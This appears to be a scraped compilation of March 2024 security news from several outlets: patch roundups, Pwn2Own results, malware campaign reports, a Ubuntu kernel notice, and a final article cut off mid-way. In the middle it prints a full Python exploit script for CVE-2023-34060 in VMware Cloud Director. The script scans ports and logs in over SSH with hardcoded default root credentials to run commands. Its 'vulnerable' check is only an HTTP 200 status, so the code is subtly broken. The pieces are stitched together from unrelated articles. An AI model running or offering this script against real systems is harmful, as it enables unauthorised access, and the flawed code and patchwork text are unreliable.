Plus: Microsoft patches over 60 vulnerabilities, Mozilla fixes two Firefox zero-day bugs, Google patches 40 issues in Android, and more.

It’s time to check your software updates. March has seen the release of important patches for Apple’s iOS, Google’s Chrome, and its privacy-conscious competitor Firefox. Bugs have also been squashed by enterprise software giants including Cisco, VMware, and SAP.

Here’s what you need to know about the security updates issued in March.

**Apple iOS**

Apple made up for a quiet February by issuing two separate patches in March. At the start of the month, the iPhone maker released iOS 17.4, fixing over 40 flaws including two issues already being used in real-life attacks.

Tracked as CVE-2024-23225, the first bug in the iPhone Kernel could allow an attacker to bypass memory protections. “Apple is aware of a report that this issue may have been exploited,” the iPhone maker said on its support page.

Tracked as CVE-2024-23296, the second flaw, in RTKit, the real-time operating system used in devices including AirPods, could also allow an adversary to bypass Kernel memory protections.

Later in March, Apple released a second software update, iOS 17.4.1, this time fixing two flaws in its iPhone software, both tracked as CVE-2024-1580. Using the issues patched in iOS 17.4.1, an attacker could execute code if they convinced someone to interact with an image.

Soon after issuing iOS 17.4.1, Apple released patches for its other devices to fix the same bugs: Safari 17.4.1, macOS Sonoma 14.4.1 and macOS Ventura 13.6.6.

**Google Chrome**

March was another hectic month for Google, which patched multiple flaws in its Chrome browser. Mid-way through the month, Google released 12 patches, including a fix for CVE-2024-2625, an object-lifecycle issue in V8 with a high severity rating.

Medium-severity issues include CVE-2024-2626, an out-of-bounds read bug in Swiftshader; CVE-2024-2627, a use-after-free flaw in Canvas; and CVE-2024-2628, an inappropriate implementation issue in Downloads.

At the end of the month, Google issued seven security fixes, including a patch for a critical use-after-free flaw in ANGLE tracked as CVE-2024-2883. Two further use-after-free bugs, tracked as CVE-2024-2885 and CVE-2024-2886, were given a high-severity rating. Meanwhile, CVE-2024-2887 is a type-confusion flaw in WebAssembly.

The last two issues were exploited at the Pwn2Own 2024 hacking contest, so you should update your Chrome browser ASAP.

**Mozilla Firefox**

Mozilla’s Firefox had a busy March, after patching two zero-day vulnerabilities exploited at Pwn2Own. CVE-2024-29943 is an out-of-bounds access bypass issue, while CVE-2024-29944 is a privileged JavaScript Execution flaw in Event Handlers that could lead to sandbox escape. Both issues are rated as having a critical impact.

Earlier in the month, Mozilla released Firefox 124 to address 12 security issues, including CVE-2024-2605, a sandbox-escape flaw affecting Windows operating systems. An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system, escaping the sandbox, Mozilla said.

CVE-2024-2615 sees critical-rated memory safety bugs fixed in Firefox 124. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort \[they\] could have been exploited to run arbitrary code,” Mozilla said.

**Google Android**

Google has released its March Android Security Bulletin, fixing nearly 40 issues in its mobile operating system, including two critical bugs in its system component. CVE-2024-0039 is a remote code-execution flaw, while CVE-2024-23717 is an elevation-of-privilege vulnerability.

“The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed,” Google said in its advisory.

You Should Update Apple iOS and Google Chrome ASAP

By Deeba Ahmed
Pwn2Own is back!
This is a post from HackRead.com Read the original post: Pwn2Own 2024 Awards $700k as Hackers Pwn Tesla, Browsers, and More

The Pwn2Own 2024 hacking contest saw a record-breaking first day as participants exposed critical vulnerabilities in Tesla vehicles, popular browsers, and operating systems – This highlights the ongoing challenge of securing our technology and the importance of bug bounty programs.

The Pwn2Own 2024, a hacking contest organized by Trend Micro’s Zero Day Initiative in Vancouver, saw participants earn over $700,000 on the first day through successful exploits against Tesla cars, browsers, and Linux and Windows systems. 

French cybersecurity firm Synacktiv’s hackers earned $200,000 for an integer overflow exploit targeting the Tesla ECU with CAN bus control and also won a new Tesla Model 3. It is worth noting that this was the only scheduled hacking attempt for Tesla cars for this contest. 

However, this isn’t the first time Synacktiv has dominated Pwn2Own – they previously won a car in Pwn2Own Automotive 2024. 

Tesla pwned (Screenshot: ZDI)

****About the Vulnerability****

While the specific details of the exploit remain undisclosed, as per Pwn2Own rules to allow for vendor patching, the competition organizers confirmed that a single integer overflow flaw was used. This vulnerability allowed the team to gain control of the Tesla’s CAN BUS, a crucial communication system within the car. Synacktiv exploited a Tesla ECU with Vehicle (VEH) CAN BUS Control using a single integer overflow flaw to secure their second victory in Pwn2Own competitions. 

****Day One Highlights****

On day one of the Pwn2Own contest, participants were awarded $732,500 by ZDI for reporting 19 unique zero-day vulnerabilities. Here’s the breakdown of the rewards.

Independent white-hat hacker Manfred Paul received $102,500 for remote code execution on Apple Safari using an integer underflow bug, and a PAC bypass exploiting a flaw in the same browser. Paul also executed a double-tap exploit on Chrome and Edge browsers using a rare CWE-1284 vulnerability in round two of the competition.

South Korean team Theori earned $130,000 by combining an uninitialized variable bug, a use-after-free (UAF) vulnerability, and heap-based buffer overflow to escape a VMware Workstation and execute code as system on Windows OS.

Oracle VirtualBox was targeted by REverse Tactics researchers, earning $90,000 and two researchers received $20,000 for their respective Oracle VirtualBox exploits. 

Other Pwn2Own participants earned rewards for Chrome and Edge, Safari, Adobe Reader, Windows 11 local privilege escalation, and two Ubuntu local privilege escalation exploits. 

Seunghyun Lee, AbdulAziz Hariri, and the Devcore Research team successfully exploited Google Chrome, Adobe Reader, and Windows 11 bugs, earning them $60,000, $50,000, and $30,000 respectively. Lee successfully executed an exploit on Google Chrome, Hariri completed a code execution attack, and the Devcore Research team successfully executed a local privilege escalation (LPE) attack.

Chrome browser pwned (Screenshot: ZDI)

Participants will attempt to hack various software on the second day, including VMware Workstation, Oracle VirtualBox, Firefox, Chrome, Edge, Ubuntu, Windows 11, and Docker Desktop. The three-day event is offering a total of $1.3m in cash and prizes.

1.  Whitehat hacker bypasses SQL injection filter for Cloudflare
2.  Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own
3.  White hat hackers infect Canon DSLR camera with ransomware
4.  Whitehat hacker shows how to detect hidden cameras in hotels
5.  White hat hacker infects smart coffee machine with ransomware

Pwn2Own 2024 Awards $700k as Hackers Pwn Tesla, Browsers, and More

By Waqas
Another day, another cybersecurity threat hits unsuspected users!
This is a post from HackRead.com Read the original post: New Malware “BunnyLoader 3.0” Steals Credentials and Crypto

New high-performance malware “BunnyLoader 3.0” steals logins, crypto & lurks undetected. Palo Alto Unit 42 reveals its tricks to help businesses & individuals fight back. Learn how to protect yourself from this evolving cyber threat.

In the scenario where cybersecurity threats are peeking, staying one step ahead of malicious actors is crucial to protecting your online business and identity. Recently, Palo Alto’s Unit 42 released a report shedding light on a dangerous new malware called BunnyLoader, and its latest version, BunnyLoader 3.0. Here’s what you need to know:

****The BunnyLoader Menace:****

BunnyLoader is not your average malware. It’s a sophisticated tool developed by cybercriminals to steal sensitive information, credentials, and even cryptocurrency from unsuspecting victims. What’s more, it’s constantly evolving, making it a challenging threat for the cybersecurity community.

****A Constantly Evolving Threat:****

Since its discovery in September 2023 on **Breach Forums**, BunnyLoader has undergone multiple updates and enhancements, each aimed at outsmarting security measures and staying under the radar of cybersecurity researchers. From bug fixes to advanced keylogging capabilities, the creators of BunnyLoader are constantly tweaking their creation to maximize its effectiveness.

****The Release of BunnyLoader 3.0:****

On February 11, 2024, the threat actors behind BunnyLoader unveiled their latest version, BunnyLoader 3.0, boasting a 90% improvement in performance. This new iteration comes with a reduced payload size and enhanced keylogging capabilities, making it even more dangerous than before.

****Behind the Scenes of BunnyLoader:****

Unit 42’s **technical write-up** provides a glimpse into the inner workings of BunnyLoader, revealing the tactics and techniques used by its creators to evade detection. From changing file names to mimicking legitimate applications, BunnyLoader employs various strategies to stay hidden from cybersecurity experts.

****Protecting Yourself Against BunnyLoader:****

With the threat of BunnyLoader looming large, it’s more important than ever to stay vigilant and take proactive measures to protect yourself and your online assets. By staying informed about the latest cyber threats and implementing robust security measures, you can minimize the risk of **falling victim to malicious actors**.

1.  95.6% of New Malware in 2022 Targeted Windows
2.  SpyNote Android Spyware Poses as Legit Crypto Wallets
3.  Malware Turns Windows, macOS Devices into Proxy Nodes
4.  Mispadu Stealer’s New Variant Targets Browser Data of Mexicans
5.  Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain

New Malware “BunnyLoader 3.0” Steals Credentials and Crypto

Microsoft patched 61 vulnerabilities in the March 2024 Patch Tuesday round, including two critical flaws in Hyper-V.

The March 2024 Patch Tuesday update includes patches for 61 Microsoft vulnerabilities. Only two of the vulnerabilities are rated critical and both of these are found in Windows Hyper-V.

Hyper-V is a hardware virtualization product that allows you to run multiple operating systems as virtual machines (VMs) on Windows. A virtual machine is a computer program that emulates a physical computer. A physical “host” computer can run multiple separate “guest” VMs that are isolated from each other, and from the host. The physical resources of the host are allocated to the VMs by a software layer called the hypervisor, which acts an intermediary between the host and guests.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The Hyper-V CVEs patched in this round of updates are:

CVE-2024-21407 is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 8.1 out of 10. Microsoft says exploitation is less likely since this vulnerability would require an authenticated attacker on a guest to send specially crafted file operation requests to hardware resources on the VM which could result in remote code execution on the host server.

This means the attacker would need a good deal of information about the specific environment, and to take additional actions prior to exploitation to prepare the target environment.

CVE-2024-21408 is a Windows Hyper-V Denial of Service (DOS) vulnerability with a CVSS score of 5.5 out of 10. This means an attacker could target a host machine from a guest and cause it to crash or stop functioning. However, Microsoft did not provide any additional details on how this DOS could occur.

The attention for Hyper-V is remarkable since only a week earlier, VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation. VMware ESXi and Hyper-V are both designed to handle large-scale virtualization deployments.

Another vulnerability worth mentioning is CVE-2024-21334, which has a CVSS score of 9.8 out of 10. It’s an Open Management Infrastructure (OMI) RCE vulnerability that affects System Center Operations Manager (SCOM). SCOM is a set of tools in Microsoft’s System Center for infrastructure monitoring and application performance management. A remote, unauthenticated attacker could exploit this vulnerability by accessing the OMI instance from the internet and sending specially crafted requests to trigger a use-after-free vulnerability.

OMI is an open source technology for environment management software products for Linux and Unix-based systems. The OMI project was set up to implement standards-based management so that every device in the world can be managed in a clear, consistent, and coherent way.

Use-after-free vulnerabilities are the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can exploit the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

Microsoft states that if the Linux machines do not need network listening, OMI incoming ports can be disabled. In other cases, customers running affected versions of SCOM (System Center Operations Manager 2019 and 2022) should update to OMI version 1.8.1-0.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities in several products:

*   Adobe Experience Manager
*   Adobe Premiere Pro
*   Adobe ColdFusion
*   Adobe Bridge
*   Adobe Lightroom
*   Adobe Animate

The **Android** Security Bulletin for February contains details of security vulnerabilities for patch level 2024-03-05 or later.

**Apple** has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities

**SAP** has released its March 2024 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Microsoft Patch Tuesday March 2024 includes critical Hyper-V flaws 

VMware Cloud Director version 10.5 suffers from an authentication bypass vulnerability.

    # Exploit Title: [VMware Cloud Director | Bypass identity verification]# Google Dork: [non]# Date: [12/06/2023]# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)# Version: [10.5]# CVE : [CVE-2023-34060]import requestsimport paramikoimport subprocessimport socketimport argparseimport threading# Define a function to check if a port is opendef is_port_open(ip, port):    # Create a socket object    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # Set the timeout to 1 second    s.settimeout(1)    # Try to connect to the port    try:        s.connect((ip, port))        # The port is open        return True    except:        # The port is closed        return False    finally:        # Close the socket        s.close()# Define a function to exploit a vulnerable devicedef exploit_device(ip, port, username, password, command):    # Create a ssh client object    client = paramiko.SSHClient()    # Set the policy to accept any host key    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())    # Connect to the target using the credentials    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)    # Execute the command and get the output    stdin, stdout, stderr = client.exec_command(command)    # Print the output    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")    # Close the ssh connection    client.close()# Parse the arguments from the userparser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")parser.add_argument("ip", help="The target IP address")parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")parser.add_argument("-u", "--username", default="root", help="The username for ssh")parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")args = parser.parse_args()# Loop through the ports and check for the vulnerabilityfor port in args.ports:    # Check if the port is open    if is_port_open(args.ip, port):        # The port is open, send a GET request to the port and check the status code        response = requests.get(f"http://{args.ip}:{port}")        if response.status_code == 200:            # The port is open and vulnerable            print(f"Port {port} is vulnerable to CVE-2023-34060")            # Create a thread to exploit the device            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))            # Start the thread            thread.start()        else:            # The port is open but not vulnerable            print(f"Port {port} is not vulnerable to CVE-2023-34060")    else:        # The port is closed        print(f"Port {port} is closed")

VMware Cloud Director 10.5 Authentication Bypass

By Waqas
Another day, another malware exploiting cloud services to steal sensitve data from unsuspecting Windows users.
This is a post from HackRead.com Read the original post: New Vcurms Malware Targets Popular Browsers for Data Theft

Cybersecurity researchers at Fortinet’s FortiGuard Labs have discovered a new threat called Vcurms malware targeting popular browsers and apps for login and data theft. They urge security updates and caution with emails.

Fortinet’s FortiGuard Labs recently uncovered a new cybersecurity threat: a malware known dubbed “Vcurms.” The attackers behind Vcurms malware have employed sophisticated tactics, using email as their command and control center and leveraging public services such as AWS and GitHub to store the malicious software. Additionally, they have employed a commercial protector to evade detection, indicating a concerted effort to maximize the malware’s impact.

****Targeting Java Platforms****

This campaign primarily targets platforms with Java installed, posing a risk to any organization utilizing such systems. The severity of the threat cannot be understated, as successful infiltration grants attackers full control over compromised systems.

****Tactics and Techniques: Spreading Vcurms****

The modus operandi of the attackers involves luring users to download a malicious Java downloader, which serves as a vector for spreading Vcurms and STRRAT, a trojan previously found to be **posing as fake ransomware infection** to steal data. These malicious emails typically masquerade as legitimate requests, urging recipients to verify payment information and download harmful files hosted on AWS.

****Phishing Traits****

Once downloaded, the malware exhibits classic phishing traits, employing spoofed names and obfuscated strings to disguise its nefarious nature. Notably, it utilizes a class named “DownloadAndExecuteJarFiles.class” to facilitate the downloading and execution of additional JAR files, further expanding the attacker’s foothold.

The Remote Access Trojan (**RAT**) component of Vcurms communicates with its command and control center via email, demonstrating a concerning level of sophistication. It establishes persistence by replicating itself into the Startup folder and employs various techniques to identify and monitor victims, including keylogging and password recovery functionalities.

****Targeting Popular Browsers and Apps****

Furthermore, the malware employs advanced obfuscation techniques, such as the **Branchlock obfuscator**, to evade detection and analysis. Despite these challenges, cybersecurity researchers continue to develop methods for deobfuscating and understanding the inner workings of Vcurms.

Vcurms also exhibits notable similarities with the **Rude Stealer malware** but distinguishes itself through its unique transmission methods and targeted data acquisition. It prioritizes stealing sensitive information from popular browsers like Chrome, Brave, Edge, Vialdi, Opera, OperaGX, Firefox, etc. and applications, including Discord and Steam.

In response to this threat, FortiGuard Labs in their **blog post**, recommend proactive measures, including the deployment of updated security solutions and network segmentation. Additionally, maintaining vital password practices and exercising caution when handling email attachments are crucial steps in mitigating the risk of Vcurms infection.

Commenting on this, **Jason Soroko**, Senior Vice President of Product at Sectigo, emphasizes the importance of authentication methods in combating malware attacks.

_“_Malware writers are benefiting from the cloud and that shouldn’t surprise anyone. RAT malware typically harvests whatever it can, and the new VCURMS and STRRAT remote access trojans seem to have one or more keyloggers,_“_ Jason warned. _“_This technique has been around for quite some time and is yet another example of why stronger authentication methods than simply a username and password are necessary._“_

1.  ToxicEye RAT hits Telegram app to spy, steal user data
2.  Fake Skype, Zoom, Google Meet Sites Infecting Devices with RATs
3.  AsyncRAT Infiltrates Key US Infrastructure Through GIFs and SVGs
4.  BRATA Android malware factory resets phones after stealing funds
5.  New Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain

New Vcurms Malware Targets Popular Browsers for Data Theft

Ubuntu Security Notice 6688-1 - Pratyush Yadav discovered that the Xen network backend implementation in the Linux kernel did not properly handle zero length data request, leading to a null pointer dereference vulnerability. An attacker in a guest VM could possibly use this to cause a denial of service. It was discovered that the Habana's AI Processors driver in the Linux kernel did not properly initialize certain data structures before passing them to user space. A local attacker could use this to expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6688-1March 11, 2024linux-oem-6.1 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oem-6.1: Linux kernel for OEM systemsDetails:Pratyush Yadav discovered that the Xen network backend implementation inthe Linux kernel did not properly handle zero length data request, leadingto a null pointer dereference vulnerability. An attacker in a guest VMcould possibly use this to cause a denial of service (host domain crash).(CVE-2023-46838)It was discovered that the Habana's AI Processors driver in the Linuxkernel did not properly initialize certain data structures before passingthem to user space. A local attacker could use this to expose sensitiveinformation (kernel memory). (CVE-2023-50431)Murray McAllister discovered that the VMware Virtual GPU DRM driver in theLinux kernel did not properly handle memory objects when storing surfaces,leading to a use-after-free vulnerability. A local attacker in a guest VMcould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-5633)It was discovered that the CIFS network file system implementation in theLinux kernel did not properly validate certain SMB messages, leading to anout-of-bounds read vulnerability. An attacker could use this to cause adenial of service (system crash) or possibly expose sensitive information.(CVE-2023-6610)It was discovered that the VirtIO subsystem in the Linux kernel did notproperly initialize memory in some situations. A local attacker could usethis to possibly expose sensitive information (kernel memory).(CVE-2024-0340)Lonial Con discovered that the netfilter subsystem in the Linux kernel didnot properly handle element deactivation in certain cases, leading to ause-after-free vulnerability. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2024-1085)Notselwyn discovered that the netfilter subsystem in the Linux kernel didnot properly handle verdict parameters in certain cases, leading to a use-after-free vulnerability. A local attacker could use this to cause a denialof service (system crash) or possibly execute arbitrary code.(CVE-2024-1086)Chenyuan Yang discovered that the RDS Protocol implementation in the Linuxkernel contained an out-of-bounds read vulnerability. An attacker could usethis to possibly cause a denial of service (system crash). (CVE-2024-23849)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - Architecture specifics;   - Block layer;   - ACPI drivers;   - Android drivers;   - EDAC drivers;   - GPU drivers;   - InfiniBand drivers;   - Media drivers;   - Multifunction device drivers;   - MTD block device drivers;   - Network drivers;   - NVME drivers;   - PHY drivers;   - PWM drivers;   - SCSI drivers;   - SPMI drivers;   - TTY drivers;   - Userspace I/O drivers;   - Ceph distributed file system;   - EFI Variable file system;   - Ext4 file system;   - F2FS file system;   - GFS2 file system;   - JFS file system;   - SMB network file system;   - BPF subsystem;   - Logical Link Layer;   - Netfilter;   - Unix domain sockets;   - AppArmor security module;(CVE-2024-26599, CVE-2023-52604, CVE-2023-52439, CVE-2024-26627,CVE-2024-26601, CVE-2024-26628, CVE-2023-52607, CVE-2023-52456,CVE-2023-52602, CVE-2023-52443, CVE-2023-52599, CVE-2023-52603,CVE-2024-26588, CVE-2024-26581, CVE-2023-52600, CVE-2024-26624,CVE-2023-52584, CVE-2024-26625, CVE-2023-52606, CVE-2023-52463,CVE-2023-52464, CVE-2023-52597, CVE-2023-52595, CVE-2023-52458,CVE-2023-52457, CVE-2023-52438, CVE-2023-52469, CVE-2023-52462,CVE-2024-26589, CVE-2024-26592, CVE-2024-26594, CVE-2023-52601,CVE-2023-52593, CVE-2023-52436, CVE-2023-52447, CVE-2023-52587,CVE-2023-52445, CVE-2023-52454, CVE-2023-52451, CVE-2023-52605,CVE-2024-26597, CVE-2023-52448, CVE-2023-52598, CVE-2024-26591,CVE-2023-52449, CVE-2023-52444, CVE-2023-52583, CVE-2023-52589,CVE-2024-26598, CVE-2023-52470, CVE-2023-52594, CVE-2023-52588,CVE-2023-52467, CVE-2024-26600)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.1.0-1035-oem      6.1.0-1035.35   linux-image-oem-22.04           6.1.0.1035.36   linux-image-oem-22.04a          6.1.0.1035.36   linux-image-oem-22.04b          6.1.0.1035.36   linux-image-oem-22.04c          6.1.0.1035.36After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6688-1   CVE-2023-46838, CVE-2023-50431, CVE-2023-52436, CVE-2023-52438,   CVE-2023-52439, CVE-2023-52443, CVE-2023-52444, CVE-2023-52445,   CVE-2023-52447, CVE-2023-52448, CVE-2023-52449, CVE-2023-52451,   CVE-2023-52454, CVE-2023-52456, CVE-2023-52457, CVE-2023-52458,   CVE-2023-52462, CVE-2023-52463, CVE-2023-52464, CVE-2023-52467,   CVE-2023-52469, CVE-2023-52470, CVE-2023-52583, CVE-2023-52584,   CVE-2023-52587, CVE-2023-52588, CVE-2023-52589, CVE-2023-52593,   CVE-2023-52594, CVE-2023-52595, CVE-2023-52597, CVE-2023-52598,   CVE-2023-52599, CVE-2023-52600, CVE-2023-52601, CVE-2023-52602,   CVE-2023-52603, CVE-2023-52604, CVE-2023-52605, CVE-2023-52606,   CVE-2023-52607, CVE-2023-5633, CVE-2023-6610, CVE-2024-0340,   CVE-2024-1085, CVE-2024-1086, CVE-2024-23849, CVE-2024-24860,   CVE-2024-26581, CVE-2024-26588, CVE-2024-26589, CVE-2024-26591,   CVE-2024-26592, CVE-2024-26594, CVE-2024-26597, CVE-2024-26598,   CVE-2024-26599, CVE-2024-26600, CVE-2024-26601, CVE-2024-26624,   CVE-2024-26625, CVE-2024-26627, CVE-2024-26628Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1035.35

Ubuntu Security Notice USN-6688-1

By Deeba Ahmed
Patch Now! One-Day Vulnerabilities Exploited by Magnet Goblin to Deliver Linux Malware!
This is a post from HackRead.com Read the original post: Magnet Goblin Hackers Using Ivanti Flaws to Deploy Linux Malware

Hackers exploit unpatched Ivanti vulnerabilities to deploy malware on Linux systems. Magnet Goblin targets businesses using outdated software. Patch immediately and implement strong security measures to protect against these attacks.

Cybersecurity researchers at Check Point are warning of a malicious campaign targeting one-day vulnerabilities in Ivanti and other security software products, potentially impacting a wide range of organizations.

The culprit behind this campaign is a financially motivated hacker group known as Magnet Goblin. This group has been active since January 2022 and specializes in leveraging newly disclosed vulnerabilities, targeting public-facing servers and edge devices.

According to Check Point’s research, Magnet Goblin is using one-day security vulnerabilities to breach edge devices and public-facing services and deploy custom malware on Linux systems. For your information, after zero-day vulnerabilities are disclosed publicly and patches are released, they are referred to as one-day vulnerabilities.

The attackers exploit unpatched servers like Ivanti Connect Secure VPN, Magento, Qlik Sense, and possibly Apache ActiveMQ to deploy a cross-platform remote access trojan (RAT) called Nerbian RAT, first documented by Proofpoint in 2022. It also utilized Nerbian RAT’s simplified variant, MiniNerbian, which allows arbitrary command execution from a C2 server. 

“NerbianRAT and MiniNerbian… these tools have operated under the radar as they mostly reside on edge devices. This is part of an ongoing trend for threat actors to target areas which until now have been left unprotected,” researchers noted.

NerbianRAT is downloaded from compromised systems with critical Ivanti Connect Secure flaws. While researching, CheckPoint discovered a 1-day vulnerability infection that led to the download of the NerbianRAT Linux variant.

The variant was used to execute various malicious activities on compromised systems, including modifying connection intervals, work time settings, and updating configuration variables.

Magnet Goblin leveraged CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, and CVE-2024-21893 in Ivanti VPNs, CVE-2022-24086 in Magento, and CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 in Qlik Sense.

They used a JavaScript credential stealer called Warpwire and the open-source tunnelling tool Ligolo to exploit these vulnerabilities. Warpwire stealer is linked to mass Ivanti vulnerability exploitation and was used in a 2022 Magento server attack. In addition, they used remote monitoring tools ScreenConnect and AnyDesk, targeting Qlik Sense and Apache ActiveMQ.

It is worth noting that Ivanti issued a public advisory in January for CVE-2024-21887, a command injection vulnerability, urging users to patch their systems against wild exploitations. However, Check Point found that Magnet Goblin exploitations occurred within a day of patch issuance, targeting systems not yet patched with available fixed updates.

Compromised Magento servers used in Magnet Goblin campaigns (Screenshot: Checkpoint)

John Gallagher, Vice President of Viakoo Labs at Viakoo commented on the findings stating, “It’s clear that Magnet Goblin is taking the easy route; using recently disclosed vulnerabilities to exploit poorly defended systems. With many edge and IoT devices and applications there is a lag time between when a vulnerability is disclosed and when a patch is available…and then another lag time between when the patch is released and when it is implemented.”

“Often the teams managing edge and IoT systems are outside of IT and may have different priorities or sense of urgency when it comes to patching. One can expect that one-day threats will be a major security issue, as the speed of AI can accelerate these specific types of threats. Until the speed of delivery by threat actors is matched by the speed of response by defenders this will be an ongoing security risk.”

Organisations of all sizes relying on Ivanti software for endpoint management and security are at potential risk. This includes companies in various sectors that utilize Ivanti to safeguard their critical infrastructure.

Therefore, patching Ivanti software is necessary to prevent exploitation along with increased monitoring, and adopting a layered security approach, including implementing Endpoint Detection and Response (EDR) solutions to strengthen the overall security of the network and devices.

1.  New Linux Malware Alert: ‘Spinning YARN’ Hits Docker
2.  Linux Malware “Migo” Exploits Redis for Cryptojacking
3.  Bifrost RAT Targets Linux Devices, Mimics VMware Domain
4.  Crypto Stealing PyPI Malware Hits Both Windows and Linux Users
5.  Mirai-based NoaBot Botnet Targeting Linux Systems with Cryptominer

Magnet Goblin Hackers Using Ivanti Flaws to Deploy Linux Malware

The flaws could allow an attacker with privileged access to a guest VM to access the hypervisor on the host.

VMWare has issued secuity fixes for its VMware ESXi, Workstation, Fusion, and Cloud Foundation products. It has even taken the unusual step of issuing updates for versions of the affected software that have reached thier end-of-life, meaning they would normally no longer be supported.

This flaws affect customers who have deployed VMware Workstation, VMware Fusion, and/or VMware ESXi by itself or as part of VMware vSphere or VMware Cloud Foundation.

A virtual machine (VM) is a computer program that emulates a physical computer. A physical “host” computer can run multiple separate “guest” VMs that are isolated from each other, and from the host. The physical resources of the host are allocated to the VMs by a software layer called the hypervisor, which acts an intermediary between the host and the VM (the guest system).

VMWare’s decision to offer fixes for end-of-life software is because the vulnerabilities patched in these updates are escape flaws that allow a computer program to breack of the confines of a VM and affect the host operating system. Specifically, an attacker with privileged access, such as root or administrator, on a guest VM can access the hypervisor on the host.

Besides instructions about how to update the affected products, the advisory lists possible workarounds that would block an attacker from exploiting the vulnerabilities. Since three of the vulnerabilities affect the USB controller, applying the workarounds will effectively block the use of virtual or emulated USB devices. For guest operating systems that do not support using a PS/2 mouse and keyboard, such as macOS, this means they will effectively be unable to use a mouse and keyboard.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs patched in these updates are:

CVE-2024-22252 and CVE-2024-22253 are use-after-free vulnerabilities in the XHCI and UHCI USB controllers of VMware ESXi, Workstation, and Fusion. A malicious actor with local administrative privileges on a virtual machine can exploit the issues to execute code as the virtual machine’s VMX process running on the host. On ESXi, the exploitation of either is contained within the VMX sandbox, but on Workstation and Fusion this may lead to code execution on the machine where Workstation or Fusion is installed.

The VMX process is a process that runs in the kernel of the VM and is responsible for handling input/output (I/O) to devices that are not critical to performance. The VMX is also responsible for communicating with user interfaces, snapshot managers, and remote consoles.

Use-after-free vulnerabilities are the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can exploit the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

CVE-2024-22254 is an out-of-bounds write vulnerability in VMWare ESXi. A malicious actor with privileges within the VMX process can trigger an out-of-bounds write leading to an escape of the sandbox.

A sandbox environment is another name for an isolated VM in which potentially unsafe software code can execute without affecting network resources or local applications.

An out-of-bounds write can occur when a program writes outside the bounds of an allocated area of memory, potentially leading to a crash or arbitrary code execution. This can happen when the size of the data being written to memory is larger than the size of the allocated memory area, when the data is written to an incorrect location within the memory area, or when the program incorrectly calculates the size or location of the data to be written

CVE-2024-22255 is an information disclosure vulnerability in the UHCI USB controller of VMware ESXi, Workstation, and Fusion. A malicious actor with administrative access to a VM may be able to exploit this issue to leak memory from the VMX process.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Patch now! VMWare escape flaws are so serious even end-of-life software gets a fix 

By Deeba Ahmed
Remote Access Trojan Threat: Beware Malicious Downloads Disguised as Meeting Apps.
This is a post from HackRead.com Read the original post: Fake Skype, Zoom, Google Meet Sites Infecting Devices with Multiple RATs

Android and Windows users, beware of fake online meeting sites such as Google Meet, Zoom, and Skype, infecting devices with malicious malware like SpyNote RAT for Android, NjRAT, and DCRat.

Zscaler’s ThreatLabz cybersecurity researchers have discovered a new scam where Remote Access Trojans (RATs) are distributed through online meeting platforms, targeting Android and Windows users with malware. The purpose is to distribute malware that can steal sensitive data and control infected devices.

